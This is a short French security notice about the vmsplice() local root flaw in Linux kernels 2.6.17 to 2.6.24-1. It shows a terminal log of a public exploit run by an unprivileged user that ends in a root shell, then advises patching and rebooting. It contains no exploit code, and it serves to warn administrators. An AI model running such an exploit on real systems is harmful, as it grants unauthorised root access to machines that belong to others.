Les kernels Linux des versions 2.6.17 à 2.6.24-1 sont actuellement victimes de la faille de vmsplice() permettant d'accéder au compte root à partir d'un compte utilisateur sans privilèges.
Voici une reproduction de la faille pour vous montrer à quel point il est malheureusement facile de la reproduire :
zic@Shiva:~$ ./vmsplice-local-root-exploit--- Linux vmsplice Local Root Exploit By qaaz--- + mmap: 0x0 .. 0x1000 + page: 0x0 + page: 0x20 + mmap: 0x4000 .. 0x5000 + page: 0x4000 + page: 0x4020 + mmap: 0x1000 .. 0x2000 + page: 0x1000 + mmap: 0xb7da6000 .. 0xb7dd8000 + root root@Shiva:~#
Pour vous en protéger, attendez simplement le correctif de sécurité qui ne devrait maintenant plus tarder pour votre distribution, ou appliquez vous-même le patch disponible sur kernel.org.
Dans les deux cas, n'oubliez pas de redémarrer : en effet, il s'agit l'une des rares fois sous les systèmes GNU/Linux où le redémarrage est nécessaire afin que les correctifs fonctionnent.
